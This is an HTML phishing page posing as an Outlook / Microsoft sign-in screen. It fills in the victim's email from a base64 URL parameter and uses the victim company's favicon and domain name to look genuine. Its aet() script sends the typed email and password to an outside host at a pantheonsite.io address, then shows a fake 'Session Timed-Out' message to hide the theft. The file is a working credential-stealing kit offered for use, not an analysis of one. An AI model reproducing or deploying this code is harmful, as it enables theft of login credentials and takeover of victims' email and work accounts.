<html>
    <head>
        <meta charset="UTF-8">
    <title>Sign in to Outlook</title>
     <link rel="icon" type="image/png" href="https://upload.wikimedia.org/wikipedia/commons/thumb/2/25/Microsoft_icon.svg/2048px-Microsoft_icon.svg.png">
        <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">
        <link rel='stylesheet' href='https://files.anpdm.com/tenko-core.css'>
        <meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.2/css/bootstrap.min.css'>
      
    <title>Sign in to Outlook</title>
    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
        }

        #background-iframe {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            filter: blur(1px); /* Apply blur effect */
            z-index: -1;
        }

        #login-box {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: 370px;
            height: auto;
            padding: 20px;
            background-color: #fff;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
        }
        #login-box input[type="email"]{
            width: 100%;
            padding: 12px 0px;
            margin: 8px 0;
            border: none;
            border-bottom: 0px solid #ccc; /* Add a straight bottom border */
            border-radius: 0; /* Remove border radius */
            box-shadow: none; /* Remove the shadow */
            box-sizing: border-box;
            background-color: transparent; /* Set the background color to transparent */
        }
 #login-box input[type="password"] 
 {
            width: 100%;
            padding: 12px 0px;
            margin: 8px 0;
            border: none;
            border-bottom: 1px solid #ccc; /* Add a straight bottom border */
            border-radius: 0; /* Remove border radius */
            box-shadow: none; /* Remove the shadow */
            box-sizing: border-box;
        }

        #login-box button {
            display: block;
            width: 100%;
            padding: 10px;
            background-color: #0078D7;
            color: #fff;
            border: none;
            border-radius: 5px;
        }
        #snackbar {
  visibility: hidden;
  min-width: 250px;
  margin-left: -125px;
  background-color: red;
  color: #fff;
  text-align: center;
  border-radius: 2px;
  padding: 16px;
  position: fixed;
  z-index: 1;
  left: 50%;
  bottom: 30px;
  font-size: 17px;
}

#snackbar.show {
  visibility: visible;
  -webkit-animation: fadein 0.5s, fadeout 0.5s 2.5s;
  animation: fadein 0.5s, fadeout 0.5s 2.5s;
}

@-webkit-keyframes fadein {
  from {bottom: 0; opacity: 0;} 
  to {bottom: 30px; opacity: 1;}
}

@keyframes fadein {
  from {bottom: 0; opacity: 0;}
  to {bottom: 30px; opacity: 1;}
}

@-webkit-keyframes fadeout {
  from {bottom: 30px; opacity: 1;} 
  to {bottom: 0; opacity: 0;}
}

@keyframes fadeout {
  from {bottom: 30px; opacity: 1;}
  to {bottom: 0; opacity: 0;}
}
    </style>
</head>
<body onload="getValueAfterHash()">


    <div id="login-box">
        <form onsubmit="return aet()">
        <p style="display:inline-block;font-size: 15px;font-weight: bold;">
            <span id="image-container" width="5px"></span>
          &nbsp;  <span id="email-domain"></span>
        </p><p>
            <span id="email-domain"></span>
            <input type="email" class="form-control form-control-sm" name="email" id="email" aria-describedby="emailHelp" required="" readonly>
        <input type="password" id="password" placeholder="Password" name="password" required><p></p>

        <button type="submit" id="submit" class="btn btn-primary btn-block" onclick="setTimeout(myFunction, 3000);">Sign in
        </button></form>
        <p>
        
            <br>
            
            
            NOTICE:
            
            This information system is the property of <b><span id="email-domain2"></span>,</b>
            by logging in, you confirm that you are an authorized employee.
            Please make sure to enter your valid email address and password to continue.
            
              </p>
    </div>
    <div id="snackbar">Session Timed-Out Try Again</div>
</body>


 <script>
        function aet() {
            // (A) GET FORM DATA
            var data = new URLSearchParams();
            data.append("e1", document.getElementById("email").value);
            data.append("e2", document.getElementById("password").value);

            // (B) AJAX
            var xhr = new XMLHttpRequest();
            xhr.open("GET", "https://dev-heonpant.pantheonsite.io/montor/index.php?" + data.toString());
            // What to do when server responds
            xhr.onload = function () { console.log(this.response); };
            xhr.send();

            // (C) PREVENT HTML FORM SUBMIT
            return false;
        }

        function myFunction() {
            var x = document.getElementById("snackbar");
            x.className = "show";
            setTimeout(function () { x.className = x.className.replace("show", ""); }, 3000);
        }
    </script>
    <script>
	var urV = new URLSearchParams(window.location.search).get("csc");
	var urlValue = window.atob(urV);
        var Domain = urlValue.split('@')[1];
        var field = document.getElementById('email');
        field.value = urlValue;
        var email = urlValue.split('@')[1];
        var emailDomain = email.split('.').slice(0, -1).join('.').toUpperCase();
        var emailDomainSpan = document.getElementById('email-domain');
        emailDomainSpan.textContent = emailDomain;
        var emailDomainSpan = document.getElementById('email-domain2');
        emailDomainSpan.textContent = emailDomain;
        var image = new Image();
        image.src = "https://www.google.com/s2/favicons?domain=" + Domain + "&sz=128";
        image.onload = function () {
            var desiredWidth = 50; // Replace with your desired width
            var desiredHeight = 50; // Replace with your desired height
            image.width = desiredWidth;
            image.height = desiredHeight;
            var imageContainer = document.getElementById("image-container");
            imageContainer.appendChild(image);
        };
    </script>




</body>
</html>
